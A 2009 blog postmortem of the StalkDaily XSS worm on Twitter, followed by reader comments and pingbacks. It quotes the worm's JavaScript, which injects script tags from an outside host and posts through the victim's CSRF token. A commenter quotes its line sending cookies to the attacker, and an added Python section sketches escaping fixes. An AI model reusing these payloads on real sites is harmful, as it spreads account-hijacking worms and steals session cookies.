Twitter StalkDaily Worm Postmortem
Twitter got hit with a little security incident this afternoon that we’ll call the “StalkDaily Worm”. I have no clue at this point whether the StalkDaily site was actually associated with the worm or whether it was simply a misdirection. I believe it to be the latter.
At around 3:43pm PST this afternoon I noticed some odd updates from a couple of my friends regarding the StalkDaily site. I then saw this tweet from @JoeCascio:
First virus-like hack of Twitter is StalkDaily.com. Looks like a code injection in the Location field of your profile.
Coming from Joe, I knew something was up. Looking at one of the infected profiles I saw a link to the StalkDaily site, but then also some script tags. These typically aren’t allowed as part of a profile URL and looked suspicious:
<a href="http://www.stalkdaily.com"/><script src="hxxp://mikeyylolz.uuuq.com/x.js>"
The trailing script tag is particularly bad and is what was getting injected into people’s profiles. Taking a quick look at the JavaScript that it actually links to, there were a few lines in particular that caught my eye:
// Tweet text the worm posts from the victim's account
var update = urlencode("Hey everyone, join www.StalkDaily.com. It's a site like Twitter but with pictures, videos, and so much more! ");
// Profile URL payload: closes the <a href="..."> of the profile link and injects the script tags
var xss = urlencode('http://www.stalkdaily.com"></a><script src="http://mikeyylolz.uuuq.com/x.js"></script><script src="http://mikeyylolz.uuuq.com/x.js"></script><a ');
var ajaxConn = new XHConn();
// Post the tweet through the victim's own logged-in session, reusing the page's CSRF token
ajaxConn.connect("/status/update", "POST", "authenticity_token="+authtoken+"&status="+update+"&tab=home&update=update");
// Write the payload into the victim's profile URL field (only excerpted lines are shown here)
ajaxConn1.connect("/account/settings", "POST", "authenticity_token="+authtoken+"&user[url]="+xss+"&tab=home&update=update");
What’s happening here is that somebody realized they could save URL-encoded data to the profile URL field, and that data would not be properly escaped when re-displayed. This is particularly nasty because you could get infected simply by viewing the Twitter profile page of somebody who was already infected. If you visited an infected profile, the JavaScript in the profile would execute and, by doing so, tweet the misleading link and update your profile with the same malicious JavaScript, thereby infecting anybody who then visited your profile on twitter.com.
This was a nasty little script.
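As an added illustration (not code from this post, from the worm, or from Twitter), here is the rendering defect described above modelled in Python: the profile URL arrives URL-encoded, is decoded and stored, and is then written into the page unescaped. The `render_safe` and `validate_profile_url` functions are assumed fixes, and the script host in the payload is a constructed placeholder rather than the real one.

```python
import html
from urllib.parse import quote, unquote, urlsplit

# Constructed stand-in for the worm's payload: same shape as the `xss` variable
# above, but with a placeholder script host instead of the real domain.
WORM_URL = ('http://www.stalkdaily.com"></a>'
            '<script src="http://worm.example/x.js"></script><a ')


def store_profile_url(form_value: str) -> str:
    """Server side: the field arrives URL-encoded (as the worm sent it) and is
    decoded before storage, so the raw quotes and tags land in the database."""
    return unquote(form_value)


def render_vulnerable(stored_url: str) -> str:
    """The 2009 bug: the stored value is concatenated straight into the markup."""
    return '<a href="' + stored_url + '">' + stored_url + '</a>'


def render_safe(stored_url: str) -> str:
    """Fix on output: HTML-escape the value for both the attribute and the text."""
    safe = html.escape(stored_url, quote=True)
    return '<a href="' + safe + '">' + safe + '</a>'


def validate_profile_url(candidate: str) -> bool:
    """Fix on input: accept only absolute http(s) URLs that contain no character
    able to close the surrounding attribute or open a new tag."""
    if any(ch in candidate for ch in '<>"\''):
        return False
    parts = urlsplit(candidate)
    return parts.scheme in ('http', 'https') and bool(parts.netloc)


def contains_script_tag(page_html: str) -> bool:
    """Detection helper: does a rendered profile page carry an injected <script>?"""
    return '<script' in page_html.lower()


def worm_round_trip() -> str:
    """Simulate the worm's POST (URL-encoded) followed by the server's decode."""
    return store_profile_url(quote(WORM_URL))


if __name__ == '__main__':
    stored = worm_round_trip()
    print(render_vulnerable(stored))   # the script tag breaks out of the href
    print(render_safe(stored))         # the same value rendered as inert text
    print(validate_profile_url(WORM_URL), validate_profile_url('http://www.stalkdaily.com'))
```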
This is also one of the reasons that I browse the web with NoScript. It’s a hassle, sure, but it prevented the script from an untrusted domain (uuuq.com) from running on Twitter.com.
As we’ve seen with worms in the past, this attack was loud and noisy and all the attackers did was collect your Twitter username and cookie. Had they been playing for real, a more profitable approach would have been to leave your profile URL intact and insert some JavaScript that turned your browser into an endpoint on a bot network. </doomandgloom>
It looks like Twitter has already taken care of the issue for the most part. Thanks to @al3x and crew for their near-instant response on what was likely a nice relaxing Saturday afternoon.
If you have the stalkdaily URL in your profile, you were likely attacked by this issue. Twitter has taken care of it at this point, so feel free to correct your URL and continue with your Saturday evening Twittering. There’s some more information on this post.
Be safe out there – the Internet is a dangerous place.
Update (2009-04-12): A brief update – another round of the worm hit Twitter on Sunday morning. It was effectively the same thing, but attacked a different field. The code, oddly enough, had also been run through an obfuscator. You can see the partially obfuscated code from the second worm here: second version of worm.
April 11th, 2009 at 5:34 pm
Hey Damon,
I was hoping you’d get to the bottom of this exploit and write it up. Thanks!! And as you say… “Let’s be careful out there!”
April 11th, 2009 at 7:01 pm
Thinking team twitter did well.
I’d like to see the deer ticks that launched this exploit doing the backstroke off Somalia
April 11th, 2009 at 7:17 pm
Good stuff, I’ve been posting that notice of the code being web address related on a number of blogs and tweets.
I think it’s a shame stalkdaily.com automatically gets the blame for this thing when the worm could’ve easily “promoted” myspace, facebook, your blog, or any other website of choosing.
@a3lx and crew did well shutting down the worm
Whoever was “in charge” of informing the tweeple was nowhere to be found. There’s no excuse for twitter having failed to post a notice to status.twitter.com about this incident. It should have been posted immediately, with any details and corrective measures that twitter was taking and that users should have taken. It should have been updated as soon as the situation progressed.
But it’s no surprise. Twitter doesn’t really care about its users. A few great people inside twitter (like @a3lx) do care, but that doesn’t help the users to know anything. The users of twitter are left in the dark hunting for answers.
In fact, as I write this, I am still inundated with user questions about what happened, how to know if they are infected, and what to do if they are.
I said it on Mashable’s page, and I’ll say it here: It was TOTALLY IRRESPONSIBLE of Twitter to leave their users in the dark.
April 11th, 2009 at 7:26 pm
Rob,
I agree Twitter does need a more effective means of notifying their users in situations like this. While perhaps abusive of the mentions functionality, I @’ed some Twitter team members a couple times as I wasn’t sure if they were aware of it or not.
Of course as I write this @twitter makes an update.
http://status.twitter.com/post/95332007
April 11th, 2009 at 7:34 pm
Damon,
In an incident like this, I think that your use of the @mention facility is exactly correct. I don’t have a lot of the team members’ names, but I sure @’ed #ev and #biz a few times (and at least @netik)
And how can you be sure if they’re aware unless someone updates the status page? Just a simple mention cuts the volume down considerably. (I do speak from first hand experience of running a TechOps department of a very public new technology site)
April 11th, 2009 at 8:48 pm
It looks like a 17 year old boy has admitted to being behind the worm : http://www.bnonews.com/news/242.html
April 12th, 2009 at 1:03 am
[...] More info on the technical internals of the attack is available at dcortesi.com. [...]
April 12th, 2009 at 1:55 am
Thanks for the tech info. It appears that stalkdaily.com is hosted by Dreamhost and uuuq.com is hosted by GoDaddy. I’ve contacted them both asking them to remove “Mikeyy”’s accounts:
http://letstakeover.blogspot.com/2009/04/fight-back-against-stalkdaily-and-its.html
April 12th, 2009 at 4:10 am
[...] technical detail on the attack is available at dcortesi.com. Twitter is reporting that they have already taken care of the problem, but still it’s probably a [...]
April 12th, 2009 at 5:10 am
Did IE8’s XSS Filter help protect against this?
April 12th, 2009 at 7:09 am
[...] a technical explanation of what was going on, I refer you to Damon Cortesi’s Twitter StalkDaily Worm Postmortem. An easy way to check to see if you’ve been infected is to search twitter for “{your [...]
April 12th, 2009 at 7:35 am
[...] a message in our comments, and a postmortem of yesterday’s vulnerability can be found on the DCortesi [...]
April 12th, 2009 at 9:29 am
[...] left a message in our comments, and a postmortem of yesterday’s vulnerability can be found on the DCortesi [...]
April 12th, 2009 at 9:58 am
Awesome write-up!
April 12th, 2009 at 10:32 am
[...] You can read the full story here. [...]
April 12th, 2009 at 11:02 am
[...] http://dcortesi.com/2009/04/11/twitter-stalkdaily-worm-postmortem/ [...]
April 12th, 2009 at 1:17 pm
[...] Python – Spam The usual cross-site redirection using JavaScript: Twitter StalkDaily Worm Postmortem script src=”hxxp://mikeyylolz.uuuq.com/x.js 212.95.49.251 NETDIRECT-NET-DEDISERV (Poland ) [...]
April 12th, 2009 at 2:45 pm
[...] a message in our comments, and a postmortem of yesterday’s vulnerability can be found on the DCortesi blog. Clearly Mikeyy is still bored as the new version is now making its way across the [...]
April 12th, 2009 at 3:03 pm
[...] has a nice description of one of the worms that hit Twitter this weekend. DCortesi . blog >> Twitter StalkDaily Worm Postmortem Tags: ( twitter worm [...]
April 12th, 2009 at 4:29 pm
[...] view it on GitHub; for a “postmortem” of the vulnerability that was exploited yesterday, see DCortesi [...]
April 12th, 2009 at 7:17 pm
[...] Comment! Found a full post mortem of the latest worm to hit the Social Media scene – StalkDaily. Very interestingly, twitter allowed script tags to be added in their profile, and 17-year-old Mickeyy Mooney employed a cross-site scripting attack to not just post an update promoting his own site StalkDaily.com, but also added the same malicious javascript to the profile pages of whoever visited an infected page. The modus operandi of the attack is described in more detail here. [...]
April 12th, 2009 at 10:06 pm
[...] has posted a nice summary of a script exploit in Twitter I knew something was up. Looking at one of the infected profiles I saw a link to the StalkDaily [...]
April 13th, 2009 at 12:17 am
[...] StalkDaily.com. A good technical description of its rather simple inner workings has been kindly provided by Damon Cortesi. As you can see, unless the mikeyylolz.uuuq.com domain is allowed to run JavaScript (very unlikely [...]
April 13th, 2009 at 3:27 am
[...] an analysis of the script that it uses, check out DCortesi’s excellent blog post. Excerpt below: … it looks like somebody realized they could save url encoded data to the [...]
April 13th, 2009 at 4:07 am
Why does the worm code send the cookie and username back to his site with:
http://mikeyylolz.uuuq.com/x.php?c=” + cookie + “&username=” + username
when it can update the profile and the notices using XHConn()?
Is that just to prove a point?
April 13th, 2009 at 6:35 am
I’ll be one to say it, thank god this was written by a script kiddie and not someone who actually had malicious intentions.
April 13th, 2009 at 7:01 am
Frank,
Maybe the worm author wanted a) a record of who had been compromised and b) the potential to re-inject or compromise those accounts again if the profile code got removed?
Or c) because he was bored and that’s what all the other worms do.
b) is interesting because say somebody with a large number of followers gets infected. They will be notified quickly and fix their profile, but imagine how frustrating it would be if their cookie was still valid and a simple cron job kept updating it.
April 13th, 2009 at 9:01 am
[...] bookmarks tagged blog DCortesi . blog » Twitter StalkDaily Worm Postmor… saved by 3 others gli0444 bookmarked on 04/13/09 | [...]
April 13th, 2009 at 10:48 am
[...] seems that an XSS worm is spreading among twitter users … here more [...]
April 13th, 2009 at 12:12 pm
[...] any involvement in the attack and says he was himself the victim of hackers. Further analysis of the attack shows that the attackers had managed to get script from another website onto [...]
April 14th, 2009 at 12:32 am
@Ed, but you guys are supposed to make it impossible for the guy to exploit you. I would’ve thought this a simple thing to handle. You don’t think that a hacker with such a great exploit is just going to let it go by without using it
Great write up by the way.
April 14th, 2009 at 2:41 am
[...] Worm [4] Twitter worm “StalkDaily” launched, spread, defeated | ITworld [5] DCortesi . blog ” Twitter StalkDaily Worm Postmortem [6] Techmeme: Update on StalkDaily.com Worm (Twitter [...]
April 18th, 2009 at 9:00 pm
[...] fought off four waves of worm attacks created by Mikeyy Mooney. Damon Cortesi wrote an excellent postmortem post that explains exactly how the worm worked and what code was [...]
April 19th, 2009 at 7:45 am
[...] also become infected just by looking at a compromised Twitter profile page. For those so inclined, Damon Cortesi has posted a blog that takes an in-depth look at the worm [...]
April 21st, 2009 at 2:45 am
[...] also become infected just by looking at a compromised Twitter profile page. For those so inclined, Damon Cortesi has posted a blog that takes an in-depth look at how the worm [...]
April 25th, 2009 at 12:48 pm
[...] This worm infected the profiles of Twitter users so that they contained malicious code. Logged-in Twitter users who would view one of these infected profiles would then, through execution of the JavaScript injected into these profiles via an XSS hole, have their own profiles infected with the same code. Therefore, propagation of this worm occurred via logged-in Twitter users simply viewing infected profiles. The source code used by this worm can be viewed here. As one can see by viewing this source code that is called from infected Twitter pages, it injects the malicious script and other data that would appear in profiles when they are infected with this worm. Damon Cortesi gives a good analysis of the worm here. [...]
April 27th, 2009 at 3:50 pm
[...] Twitter StalkDaily Worm Postmortem [...]
May 3rd, 2009 at 6:24 pm
[...] Mikeyy worm: a 17-year-old, Michael Mooney, made himself famous within a few hours by creating a worm that exploited poor filtering of incoming messages. [...]
June 16th, 2009 at 8:35 am
[...] and executed consistently. An excellent example of stored cross site scripting is the recent Mikeyy Stalk Daily worm attack on Twitter. Mikeyy’s code was stored in the profile data for twitter users and was subsequently [...]
June 19th, 2009 at 7:35 am
“Thinking team twitter did well.”
Thinking they are foolish.
August 7th, 2009 at 12:33 am
[...] An additional interesting blog is about the Twitter black-out that happened a couple of days ago; the user explains in detail what really happened to Twitter becoming unavailable. http://dcortesi.com/2009/04/11/twitter-stalkdaily-worm-postmortem/ [...]
August 11th, 2009 at 11:34 pm
[...] on Twitter The details are around here and here. Everyone seems to be enjoying themselves, but… [...]